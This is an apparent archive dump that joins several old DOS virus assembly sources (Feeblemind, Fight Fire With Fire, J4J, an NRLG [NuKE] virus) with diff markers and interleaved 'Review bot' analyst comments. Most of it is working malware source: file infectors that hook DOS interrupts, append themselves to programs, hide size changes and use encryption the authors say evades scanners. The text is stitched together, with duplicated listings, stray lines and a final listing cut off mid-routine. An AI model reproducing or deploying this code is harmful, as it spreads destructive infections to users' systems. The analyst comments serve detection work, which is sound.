;
Start: Jmp Install
Old21 Dd 0
Org21 Dd 0
Inc10: Add Ah,10h
Eoi: Jmp Dword Ptr Cs:[Org21]
New21: Sub Ah,10h
Cmp Ax,3b00h
Jne Inc10
Push Ax
Push Bx
Push Cx
Push Dx
Push Ds
Push Es
Push Si
Push Di
Mov Ax,3d02h
Pushf
Call Dword ptr Cs:[Old21]
Xchg Ax,Bx
Mov Ah,30h
Add Ah,10h
Mov Cx,VLen
Lea Dx,Start
Mov Ds,Cs
Pushf
Call Dword ptr Cs:[Old21]
Mov Ah,3eh
Pushf
Call Dword Ptr Cs:[old21]
Pop Di
Pop Si
Pop Es
Pop Ds
Pop Dx
Pop Cx
Pop Bx
Pop Ax
Jmp EOI
Db '[Feeblemind]'
Install: Mov Ax,3501h
Int 21h
Mov Word Ptr Cs:[Old1],Bx
Mov Word Ptr Cs:[Old1][2],Es
Mov Ax,2501h
Mov Ds,Cs
Lea Dx,New1
Int 21h
Cli
Pushf
Pop Ax
Or Ah,1
Push Ax
Popf
Sti
Mov Ah,30h
Int 21h
Cli
Pushf
Pop Ax
And Ah,0feh
Push Ax
Popf
Sti
Mov Ds,Word ptr Cs:[Old1][2]
Mov Dx,Word ptr Cs:[Old1]
Mov Ax,2501h
Int 21h
Mov Ax,1521h
Add Ah,20h
Int 21h
Mov Word Ptr Cs:[Org21],Bx
Mov Word Ptr Cs:[Org21][2],Es
Mov Ax,1521h
Add Ah,10h
Mov Ds,Cs
Lea Dx,New21
Int 21h
Lea Dx,EndByte
Int 27h
Old1 Dd 0
New1: Push Bp
Mov Bp,Sp
Cmp Word Ptr Ss:[Bp][4],116h
Jne Einde
Push Ax
Mov Ax,Ss:[Bp][4]
Mov Word Ptr Cs:[Old21][2],Ax
Mov Ax,Ss:[Bp][2]
Mov Word Ptr Cs:[Old21],Ax
And Word Ptr Ss:[Bp][6],0fffeh
Pop Ax
Einde: Pop Bp
Iret
Endbyte Db 0
Vlen Equ $-Start
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄ> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <ÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
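Review bot: This listing and the file section that follows it are the same text line for line as rendered here, so the re-organize appears to add Feeblemind twice; the paths are not visible on this page, so confirm whether one is a stray copy. Apart from the name the file is undocumented, and the DOS function numbers are disguised by arithmetic on `Ah`: `Sub Ah,10h` / `Cmp Ax,3b00h` matches the exec call 4B00h, `Mov Ah,30h` / `Add Ah,10h` is write (40h), and `Mov Ax,1521h` with `Add Ah,20h` or `Add Ah,10h` gives 3521h and 2521h. Comments such as `; Ah = 40h (write)` on those pairs would save an analyst the decoding. `New1` is an `int 1` single-step handler that records the interrupted CS:IP into `Old21` when the code segment on the stack equals 116h and then clears the trap flag in the saved flags.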
@@ -0,0 +1,120 @@
;
; Feeblemind
;
Start: Jmp Install
Old21 Dd 0
Org21 Dd 0
Inc10: Add Ah,10h
Eoi: Jmp Dword Ptr Cs:[Org21]
New21: Sub Ah,10h
Cmp Ax,3b00h
Jne Inc10
Push Ax
Push Bx
Push Cx
Push Dx
Push Ds
Push Es
Push Si
Push Di
Mov Ax,3d02h
Pushf
Call Dword ptr Cs:[Old21]
Xchg Ax,Bx
Mov Ah,30h
Add Ah,10h
Mov Cx,VLen
Lea Dx,Start
Mov Ds,Cs
Pushf
Call Dword ptr Cs:[Old21]
Mov Ah,3eh
Pushf
Call Dword Ptr Cs:[old21]
Pop Di
Pop Si
Pop Es
Pop Ds
Pop Dx
Pop Cx
Pop Bx
Pop Ax
Jmp EOI
Db '[Feeblemind]'
Install: Mov Ax,3501h
Int 21h
Mov Word Ptr Cs:[Old1],Bx
Mov Word Ptr Cs:[Old1][2],Es
Mov Ax,2501h
Mov Ds,Cs
Lea Dx,New1
Int 21h
Cli
Pushf
Pop Ax
Or Ah,1
Push Ax
Popf
Sti
Mov Ah,30h
Int 21h
Cli
Pushf
Pop Ax
And Ah,0feh
Push Ax
Popf
Sti
Mov Ds,Word ptr Cs:[Old1][2]
Mov Dx,Word ptr Cs:[Old1]
Mov Ax,2501h
Int 21h
Mov Ax,1521h
Add Ah,20h
Int 21h
Mov Word Ptr Cs:[Org21],Bx
Mov Word Ptr Cs:[Org21][2],Es
Mov Ax,1521h
Add Ah,10h
Mov Ds,Cs
Lea Dx,New21
Int 21h
Lea Dx,EndByte
Int 27h
Old1 Dd 0
New1: Push Bp
Mov Bp,Sp
Cmp Word Ptr Ss:[Bp][4],116h
Jne Einde
Push Ax
Mov Ax,Ss:[Bp][4]
Mov Word Ptr Cs:[Old21][2],Ax
Mov Ax,Ss:[Bp][2]
Mov Word Ptr Cs:[Old21],Ax
And Word Ptr Ss:[Bp][6],0fffeh
Pop Ax
Einde: Pop Bp
Iret
Endbyte Db 0
Vlen Equ $-Start
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄ> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <ÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+256
@@ -0,0 +1,256 @@
; VirusName: Fight Fire With Fire
; Country : Sweden
; Author : Metal Militia / Immortal Riot
; Date : 07-22-1993
;
; This is an mutation of 7th-son from 'Unknown'.
; Many thanks to the scratch coder of 7th-son.
;
; We've tried this virus ourself, and it works just fine.
; Non-overwriting, adds 473 to any comfile over 1701 bytes,
; in current directory. No bugs have been reported.
; Originally from the Netherlands, in 1991.
;
; This is the second real mutation of 7th-son.
;
; McAfee Scan v105 can't find it, and
; S&S Toolkit 6.5 don't find it either.
;
; I haven't tried with scanners like Fprot/Tbscan,
; but they will probably report some virus structure.
;
; Best Regards : [Metal Militia]
; [The Unforgiven]
cseg segment
assume cs:cseg,ds:cseg,es:cseg,ss:cseg
FILELEN equ quit - start
MINTARGET equ 1701 ; MINIMUM bytes of file to infect
MAXTARGET equ -(FILELEN+40h) ; MAX bytes of file to infect
org 100h
.RADIX 16
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
begin: db 5Dh
jmp start
;****************************************************************************
;* Begin of the virus
;****************************************************************************
start: call start2
start2: pop bp
push cs
sub bp,0103h
lea si,[bp+offset begbuf-4] ;restore begin of file
mov di,0100h
movsw
movsw
mov ax,3300h ;get ctrl-break flag
int 21
push dx
xor dl,dl ;clear the flag
mov ax,3301h
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
mov dx,offset ni24 - 4 ;set new int24 vector
add dx,bp
mov ax,2524h
int 21
lea dx,[bp+offset quit] ;set new DTA adres
mov ah,1Ah
int 21
add dx,1Eh
mov word ptr [bp+offset nameptr-4],dx
lea si,[bp+offset grandfather-4] ;check generation
cmp [si],0808h
jne verder
lea dx,[bp+offset sontxt-4] ;9th son of a 9th son!
mov ah,09h
int 21
verder: mov ax,[si] ;update generations
xchg ah,al
xor al,al
mov [si],ax
lea dx,[bp+offset filename-4] ;find first COM-file
xor cx,cx
mov ah,4Eh
int 21
infloop: mov dx,word ptr [bp+offset nameptr-4]
call infect
mov ah,4Fh ;find next file
int 21
jnc infloop
pop ds ;restore int24 vector
pop dx
mov ax,2524h
int 21
pop dx ;restore ctrl-break flag
mov ax,3301h
int 21
push cs
push cs
pop ds
pop es
mov ax,0100h ;put old start-adres on stack
push ax
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
mov ax,4300h ;ask attributes
int 21
push cx
xor cx,cx ;clear flags
call setattr
jc return1
mov ax,3D02h ;open the file
int 21
jc return1
xchg bx,ax
mov ax,5700h ;get file date & time
int 21
push cx
push dx
mov cx,4 ;read begin of file
lea dx,[bp+offset begbuf-4]
mov ah,3fh
int 21
mov al,byte ptr [bp+begbuf-4] ;already infected?
cmp al,5Dh
je return2
cmp al,5Ah ;or a weird EXE?
je return2
call endptr ;get file-length
cmp ax,MAXTARGET ;check length of file
jnb return2
cmp ax,MINTARGET
jbe return2
push ax
mov cx,FILELEN ;write program to end of file
lea dx,[bp+offset start-4]
mov ah,40h
int 21
cmp ax,cx ;are all bytes written?
pop ax
jnz return2
sub ax,4 ;calculate new start-adres
mov word ptr [bp+newbeg-2],ax
call beginptr ;write new begin of file
mov cx,4
lea dx,[bp+offset newbeg-4]
mov ah,40h
int 21
inc byte ptr [si] ;number of next son
return2: pop dx ;restore file date & time
pop cx
mov ax,5701h
int 21
mov ah,3Eh ;close the file
int 21
return1: pop cx ;restore file-attribute
; call setattr
; ret
;****************************************************************************
;* Changes file-attributes
;****************************************************************************
setattr: mov dx,word ptr [bp+offset nameptr-4]
mov ax,4301h
int 21
ret
;****************************************************************************
;* Subroutines for file-pointer
;****************************************************************************
beginptr: mov ax,4200h ;go to begin of file
jmp short ptrvrdr
endptr: mov ax,4202h ;go to end of file
ptrvrdr: xor cx,cx
xor dx,dx
int 21
ret
;****************************************************************************
;* Interupt handler 24
;****************************************************************************
ni24: mov al,03
iret
;****************************************************************************
;* Data
;****************************************************************************
begbuf db 0CDh, 20h, 0, 0
newbeg db 5Dh, 0E9h, 0, 0
nameptr dw ?
sontxt db 'Fight Fire With Fire...',0Dh, 0Ah, '$' ;printed after
grandfather db 0 ;XX infections
father db 0
filename db '*.COM',0 ; File(s) to infect
db 'Soon to fill our lungs the hot winds of death '
db 'The gods are laughing, so take your last breath '
db 'é]`x·u '
db 'Immortal Riot..Death Greets me warm..'
quit:
cseg ends
end begin

+909
@@ -0,0 +1,909 @@
;J4J - Jump For Joy, released 31 Jan 92, (c) Charlie of Demoralized Youth
;------------------------------------------------------------------------
;This source has been lying around for a veeeeeery long time, and I will
;*NOT* continue to make newer versions of J4J, so that is the reason
;why I release the source.
;
;It's been 'bout a month since my last glance on it, so it's maybe full
;of bugs, but anyways; assemble with A86
;
;Some idea's were taken from Omicron / FLIP B (Just the startup), but
;the rest was done by CHARLIE of DEMORALIZED YOUTH!
;
;Fuck this code up however you like...
tsr_bytes equ 1024
tsr_para equ (4096 / 16)
cpt1 equ $
mov ax,1991
mov bx,ax
mov cx,ax
add ax,13881
int 21h
cmp ax,cx
je fail
cmp sp,-10h
jb fail
mov ax,cs
dec ax
mov es,ax
cmp byte es:[0000h],'Z'
jne fail
mov ax,es:[0003h]
sub ax,tsr_para
jc fail
mov es:[0003h],ax
sub word ptr es:[0012h],tsr_para
mov es,es:[0012h]
call $+3
cpt3 equ $
pop si
mov bx,si
sub si,(cpt3-cpt1)
add si,(cpt4-cpt1)
push cs
push si
mov si,bx
sub si,(cpt3-cpt1)
mov cx,offset total-100h
mov di,100h
push es
rep movsb
mov di,17Dh+2
push di
retf
cpt4 equ $
fail:
mov ax,100h
push ax
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
xor si,si
xor di,di
xor bp,bp
push cs
push cs
pop es
pop ds
mov word [100h],20CDh
rpl1 equ $-2
mov byte [102h],90h
rpl2 equ $-1
ret
cpt2 equ $
jmp init
fcb_open dw offset fcb_open_cont
exec dw offset back
open_handle dw offset back
new_int_21:
pushf
cmp ah,0Fh ;open file using FCB's
jne not_open_fcb
call fcb_to_asciiz
push dx
push ds
push cs
pop ds
mov dx,offset file
push cs:[fcb_open]
jmp file_main
fcb_open_cont:
pop ds
pop dx
jmp back
not_open_fcb:
;cmp ah,4Eh
;je handle_dir
;cmp ah,4Fh
;je handle_dir
cmp ah,11h
je fcb_dir
cmp ah,12h
je fcb_dir
cmp ah,3Eh
jne clodd
cmp bx,1991
jne clodd
xchg ax,bx
popf
iret
clodd:
cmp ah,3Dh
jne last_chance
push cs:[open_handle]
jmp file_main
last_chance:
cmp ax,4B00h
jne back
push cs:[exec]
jmp file_main
back:
popf
db 0EAh
old_int_21 dw 0,0
handle_dir:
popf
call int21
pushf
jnc back_handle_dir
cmp ax,0
jne back_handle_dir
call stealth_dir_handle
sti
back_handle_dir:
popf
iret
fcb_dir:
popf
call int21
pushf
cmp al,00h
jne back_fcb_dir
call stealth_dir_fcb
sti
back_fcb_dir:
popf
iret
fcb_fname equ 80h+1
fcb_fext equ 80h+1+8
f_attr equ 80h+15h
f_time equ 80h+16h
f_date equ 80h+18h
f_size equ 80h+1Ah
f_asciiz equ 80h+1Eh
f_handle equ 80h
f_head_buffer equ 80h+2
f_tail_buffer equ 80h-3
f_type equ 80h+6
repl0: db 0E8h,?,? ;call ????
;repl1: db 0C7h,6,0,1,?,? ;mov word [0100h],????
; db 0C6h,6,2,1,? ;mov byte [0102h],??
repl2: push bp
mov bp,sp
sub word [bp+2],3
pop bp
repl3:
db 'Elo, Elo, lam  sabakt ni?'
file_main:
pushf
;call other_file_type_check
;jnc file_main_pr1
jmp file_main_pr1
popf
jmp back
file_main_pr1:
push ax
push bx
push cx
push dx
push si
push di
push bp
push es
push ds
push cs
pop es
mov si,dx
mov di,offset file
cld
mov cx,65
rep movsb
push cs
pop ds
call setup_24
;call cpu_check
;cmp ax,1
;je file_slutt
call file_info_get
jc file_is_done
call mekke_fil
file_is_done:
call file_info_set
file_slutt:
call rest_24
pop ds
pop es
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
ret ;jmp back
file db 65 dup(0)
old_dta dw ?,?
file_info_get:
mov ah,2Fh ;get DTA address
call int21
mov old_dta[2],es
mov old_dta[0],bx
mov ah,1Ah ;set DTA address
push cs
pop ds
mov dx,80h
call int21
mov ah,4Eh ;FIND FIRST (get info about
mov cx,1+2+32 ;our file)
mov dx,offset file
call int21
jnc file_info_get_ok
stc
ret
stc
ret
file_info_get_ok:
clc
test word [f_attr],4 ;is the System attr. set?
jnz offset file_info_get_ok-2 ;yeah, so don't do it..
cmp word [fcb_fname],'OC' ;like in: COmmand.com
je offset file_info_get_ok-2 ;the command-interpreter
cmp word [fcb_fname],'BI' ;like in: IBmbio.com and IBmdos.com
je offset file_info_get_ok-2 ;the startup files for IBM-dos
cmp word [fcb_fext],'YS' ;like in: country.SYs
je offset file_info_get_ok-2 ;device drivers and .SYS files
mov ax,4301h ;set attribute
xor cx,cx ;attr=0
mov dx,offset file
call int21
mov ax,3D02h ;open file
mov dx,offset file
call int21
jnc fig_open
fig_fail:
stc
ret
fig_open:
mov [f_handle],ax
mov bx,ax
mov ah,3Fh ;read from file
mov cx,3 ;3 bytes
mov dx,f_head_buffer
call int21
jnc fig_read
jmp fig_fail
fig_read:
cmp ax,3
jne fig_fail
mov ax,4200h
xor cx,cx
mov dx,[f_size]
sub dx,3
mov bx,[f_handle]
call int21
mov ah,3Fh
mov cx,3
mov dx,f_tail_buffer
call int21
cmp word [f_size+2],0
jnz fig_fail
cmp [f_size],60000
ja fig_fail
cmp word [f_head_buffer],'MZ' ;EXE 'ZM' ?
je file_is_exe
cmp word [f_head_buffer],'ZM' ;EXE 'MZ' ?
je file_is_exe
cmp word [f_head_buffer],-1 ;Device Driver ?
je fig_fail
mov byte [f_type],0 ;filetype = COM
clc
ret
file_is_exe:
mov byte [f_type],1 ;filetype = EXE
clc
ret
file_info_set:
mov ah,1Ah ;set DTA address
mov dx,old_dta[0]
mov bx,old_dta[2]
mov ds,bx
call int21
push cs
pop ds
mov ax,4301h ;restore ATTRibutes
mov cx,[f_attr]
mov dx,offset file
call int21
mov ax,5701h ;restore DATE & TIME
mov bx,[f_handle]
mov cx,[f_time]
and cl,255-31
or cl,30
mov dx,[f_date]
call int21
mov ah,3Eh ;close file
mov bx,[f_handle]
call int21
ret
db '¨­¨--?!?'
mekke_fil:
cmp [f_size],1023
ja not_one_n0
stc
ret
not_one_n0:
cmp byte ptr [f_type],0
je not_one_n1
stc
ret
not_one_n1:
cmp word ptr [f_tail_buffer],'4J'
jne not_one
stc
ret
not_one:
mov ax,[f_size] ;calculate CALL
sub ax,3 ;length
mov repl0[1],ax
mov ax,word [f_head_buffer]
mov bl,byte [f_head_buffer]+2
mov [offset rpl1],ax
mov [offset rpl2],bl
; mov word ptr repl1[4],ax ;restore orig bytes
; mov repl1[10],bl ;after CALL...
mov ax,4200h ;seek to file_start
mov bx,[f_handle]
xor cx,cx
mov dx,cx
call int21
mov ah,40h ;write CALL XXXX
mov bx,[f_handle]
mov cx,3 ;3 bytes
mov dx,offset repl0
call int21
mov ax,4202h ;seek to EOF
mov bx,[f_handle]
xor cx,cx
mov dx,cx
call int21
; mov ah,40h ;write startup-code
; mov bx,[f_handle]
; mov cx,(offset repl3)-offset repl1
; ;???? bytes
; mov dx,offset repl1
; call int21
; jc replace_them_now
mov ah,40h ;write main code
mov bx,[f_handle]
mov cx,offset total-100h
mov dx,100h
call int21
jc $+2+1+1
clc
ret
replace_them_now:
mov ax,4200h ;seek to beginning
mov bx,[f_handle] ;of the file
xor cx,cx
mov dx,cx
call int21
mov ah,40h ;error, so write
mov bx,[f_handle] ;back 3 first bytes
mov cx,3
mov dx,f_head_buffer
call int21
stc
ret
db 'Charlie says: Support ()DEMORALIZED YOUTH() '
;;*************************************************************
;;* CPU checker, coded by Data Disruptor / RABiD Nat'nl Corp. *
;;*************************************************************
;cpu_check:
; xor ax,ax
; push ax
; popf
; pushf
; pop ax
; and ax,0f000h
; cmp ax,0f000h
; je mc_8086
; mov ax,0f000h
; push ax
; popf
; pushf
; pop ax
; and ax,0f000h
; jz mc_80286
; mov ax,3
; ret
;mc_80286:
; mov ax,2
; ret
;mc_8086:
; mov ax,1
; ret
;***************************************
;
; Call previously saved Int 21h Handler
;
;***************************************
int21:
pushf
call dword ptr cs:old_int_21
ret
;**********************************************
;
; Int 24h (Critical Error Handler) Code & Data
;
;**********************************************
err dw 0
old_24 dw ?,?
new_24: inc cs:err
mov al,0
stc
iret
;****************************************************************
;
; Fix so that Int 24h (Critical Error Handler) won't display the
; "abort, retry, fail?" message
;
;****************************************************************
setup_24:
xor ax,ax
mov ds,ax
les bx,[24h*4]
push cs
pop ds
mov word ptr old_24[0],bx
mov word ptr old_24[2],es
mov ds,ax
mov word ptr [24h*4],offset new_24
mov word ptr [24h*4+2],cs
push cs
push cs
pop es
pop ds
ret
;**********************************************************
;
; Restore original Int 24h (Critical Error Handler) vector
;
;**********************************************************
rest_24:
les bx,cs:old_24
xor ax,ax
mov ds,ax
mov word ptr [24h*4],bx
mov word ptr [24h*4+2],es
push cs
pop ds
ret
;*********************************************************
;
; Check if the filename has got an extension of .COM or
; .EXE. Returns with CY if not a valid filetype, or NC if
; it is a valid one.
;
;*********************************************************
other_fail:
pop bp
pop ds
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
stc ;return with CY
ret
other_file_type_check: ;here the main routine starts
pushf
push ax
push bx
push cx
push dx
push si
push di
push es
push ds
push bp
mov di,dx
push ds
pop es
cld
mov cx,127
xor al,al
repnz scasb
jne other_fail
dec di
dec di
dec di
dec di
dec di
xchg si,di
lodsb
cmp al,'.'
jne other_fail
lodsw
and ax,0DFDFh
cmp ax,'OC'
je other_okfil
cmp ax,'XE'
je other_okfil
jmp other_fail
other_okfil:
lodsb
and al,0DFh
cmp al,'M'
je other_okfil2
cmp al,'E'
jne other_fail
other_okfil2:
pop bp
pop ds
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
clc ;return with NC
ret
stealth_dir_handle:
jc done_stealthing_handle
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp
mov ah,2Fh
call int21
mov ax,word ptr es:[bx+16h]
mov ah,1Eh
and al,1Fh
cmp al,ah
jne done_stealthing_handle
cmp word es:[bx+1Ah+2],0
jne done_stealthing_handle
mov ax,word es:[bx+1Ah]
sub ax,(offset total)-100h
jc done_stealthing_handle
mov word es:[bx+1Ah],ax
done_stealthing_handle:
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
ret
stealth_dir_fcb:
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp
mov ah,2Fh
call int21
; mov es,ds
; mov bx,dx
mov ax,word ptr es:[bx+14+10h] ;16h]
mov ah,30 ;1Eh
and al,31 ;1Fh
cmp al,ah
jne done_stealthing_fcb
cmp word es:[bx+22+10h],0 ;+10h+2],0
jne done_stealthing_fcb
mov ax,word es:[bx+20+10h] ;+10h]
sub ax,(offset total)-100h
jc done_stealthing_fcb
mov word es:[bx+20+10h],ax
done_stealthing_fcb:
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
ret
init:
cli
push cs
push cs
pop ds
pop es
mov ax,3521h
int 21h
mov word ptr old_int_21[0],bx
mov word ptr old_int_21[2],es
mov dx,offset new_int_21
mov ax,2521h
int 21h
sti
retf
fcb_to_asciiz:
pushf
push ax
push cx
push si
push di
push es
push cs
pop es
mov di,offset file
cld
mov si,dx ;fcb_start
lodsb
cmp al,0
je fcb_in_current_dir
add al,'A'
stosb
mov al,':'
stosb
jmp anyway
fcb_in_current_dir:
inc si
anyway:
mov si,dx
inc si
mov cx,8
fcb_file_name_xfer:
lodsb
cmp al,' '
je fcb_done_1
stosb
loop fcb_file_name_xfer
fcb_done_1:
mov al,'.'
stosb
mov si,dx ;fcb_start
add si,1+8
mov cx,3
fcb_file_ext_xfer:
lodsb
cmp al,' '
je fcb_done_2
stosb
loop fcb_file_ext_xfer
fcb_done_2:
mov al,0
stosb
pop es
pop di
pop si
pop cx
pop ax
popf
ret
size dw (offset total)-100h
db 'J4J'
total:
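Review bot: The opening comment block (`;J4J - Jump For Joy` through `;Fuck this code up however you like...`) records only authorship and the assembler, so nothing in this section tells an analyst what to match on; I would add a header such as `; Residency check: INT 21h AX=3E00h, BX=07C7h (1991) -> returns AX=07C7h` and `; Markers: file ends in 'J4J'; timestamp seconds field = 1Eh; FCB dir size stealth (AH=11h/12h)`. Both values are read from the code: `mov ax,1991` / `add ax,13881` gives 3E00h, and `new_int_21` answers AH=3Eh with BX=1991 through `xchg ax,bx`. The header should also say that `file_info_set` applies the 1Eh seconds value on its way out whether or not `mekke_fil` wrote anything, so the timestamp alone looks like weak evidence of infection, and the `'4J'` tail compare in `mekke_fil` is the check the code itself relies on. `tsr_bytes equ 1024` disagrees with `tsr_para equ (4096 / 16)`, which is the value the MCB arithmetic actually uses.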

@@ -0,0 +1,3 @@
Bit Addict [TridenT] - A collection
of his viruses, code and sources.
<-Cicatrix-|05/95> Update 1
@@ -0,0 +1,438 @@
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
.286
code segment
assume cs:code,ds:code
org 100h
start: CALL NEXT
NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------
ÿxor word ptr [di],0e3ddh
xor word ptr [di],0dddbh
inc word ptr [di]
add byte ptr [di],059h
inc word ptr [di]
inc word ptr [di]
add word ptr [di],0b6bh
inc word ptr [di]
sub word ptr [di],01654h
sub word ptr [di],077c2h
sub byte ptr [di],05dh
not word ptr [di]
sub byte ptr [di],0c4h
xor word ptr [di],09e43h
inc word ptr [di]
inc word ptr [di]
not byte ptr [di]
ÿinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************
ÿcall ANTI_V
;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************
mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db '[NuKE] N.R.L.G. AZRAEL'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
